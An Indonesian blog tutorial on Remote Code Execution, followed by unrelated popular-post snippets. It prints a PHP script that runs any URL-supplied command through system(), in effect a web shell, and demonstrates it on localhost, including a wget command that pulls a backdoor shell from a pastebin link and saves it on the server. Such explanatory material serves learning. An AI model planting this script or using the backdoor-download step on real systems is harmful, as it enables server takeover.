Skip to main content

Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.
Labels:

Comments

Post a Comment

Popular posts from this blog

Jasa Fogging Nyamuk Murah Bandung | 0857-4789-0221 - Garda Pest

  Memerlukan informasi tentang   Jasa Fogging Nyamuk Murah Bandung   ?   Garda pest Control Perusahaan pengendalian hama dan disinfeksi virus yang profesional dan untuk harga pasti terjangkau, dengan Layanan Cepat Berkualitas kami manjamin kepuasan pelanggan. Jasa Fogging Nyamuk Murah Bandung dan Berkualitas Artikel Lainya Tentang :  Virus Varian Terbaru Waspada Penularan Nyamuk Demam Berdarah (DBD) Waspada nyamuk di rumah Anda, mencegah lebih baik daripada mengobati. Lakukan tindakan pencegahan untuk mencegah populasi nyamuk dewasa dengan 3M Plus dan layanan gerimis nyamuk. Pilih layanan yang terbaik dan profesional, Dengan banyaknya perusahaan jasa fogging nyamuk murah dengan hasil yang mengecewakan kami sarankan pilihlah jasa yang profesional berpengalaman di bidang pengendalian hama. Garda Pest Control memiliki pengalaman lebih dari 10 tahun dalam pengendalian hama. Baca Juga Artikel Tentang :  Cara Mengusir Nyamuk di Rumah Mengapa Jasa Garda Pest Contr...
Post a Comment
Read more

WA:0813-1344-4221 Jasa Disinfektan Covid Ciparigi Bogor

Hub: 0813-1344-4221 Jasa Disinfektan Covid Ciparigi Bogor, Jasa Semprot Disinfektan Ciparigi Bogor, Jasa Semprot Disinfektan Untuk Rumah Ciparigi Bogor, Jasa Semprot Disinfektan Untuk Rumah Ciparigi Bogor, Jasa Semprot Disinfektan di Ciparigi Bogor, Jasa Penyemprotan Disinfektan Ciparigi Bogor. Kami Juga melayani Jasa Fogging Nyamuk Tangerang, Jasa Fogging Nyamuk di Bali, Jasa Pembasmi Tikus Jogja, Jasa Pembasmi Tikus Solo, Jasa Pembasmi Tikus di Jogja, Jasa Pembasmi Kecoa di Apartement, Jasa Anti Rayap Bsd, Jasa Anti Rayap di Yogyakarta, Jasa Pembasmi Rayap di Cirebon dll...? Garda Pest Control ahlinya Proses sanitasi ketika penyemprotan disinfektan khusus sangat diperlukan untuk membersihkan ruangan dari beberapa virus, bakteri dan kuman yang membahayakan kesehatan. Secara teknis, keberadaan virus harus diamati meskipun bahkan ruang pribadi. Terutama dalam suasana pandemi ini. Karena beberapa jenis virus dapat memasuki tubuh kita, terutama dengan perantara udara inhalasi. Jika ruanga...
Post a Comment
Read more

Pengalaman Terbang dengan Jetstar

Si Ayah di bandara Hobart, Tasmania Di Australia, siapa yang nggak kenal Jetstar? Maskapai anak perusahaan Qantas ini menjadi pilihan utama orang-orang Aussie untuk penerbangan murah, baik domestik maupun internasional. Popularitas Jetstar di Australia seperti Air Asia untuk kawasan Asia. Kami sendiri sudah beberapa kali naik Jetstar. Semua tiket Jetstar saya pesan langsung dari website mereka . Saya senang dengan website Jetstar yang gampang dipakai ini. Untuk memesan tiket tidak harus memasukkan detil macam-macam, cukup nama, tanggal lahir dan kontak email dan telpon. Dengan mudah, saya bisa membelikan tiket untuk keluarga saya, termasuk untuk Ayah, Ibu, Mertua dan Adik-adik saya di Indonesia. Jadi travel agen gratisan ceritanya :) Pembayaran bisa menggunakan kartu kredit atau transfer bank (khusus bank Australia dan New Zealand). Jetstar melayani rute domestik yang menghubungkan kota-kota di Australia dan penerbangan internasional di antaranya ke Indonesia, Singapura, Selandia Baru,...
Post a Comment
Read more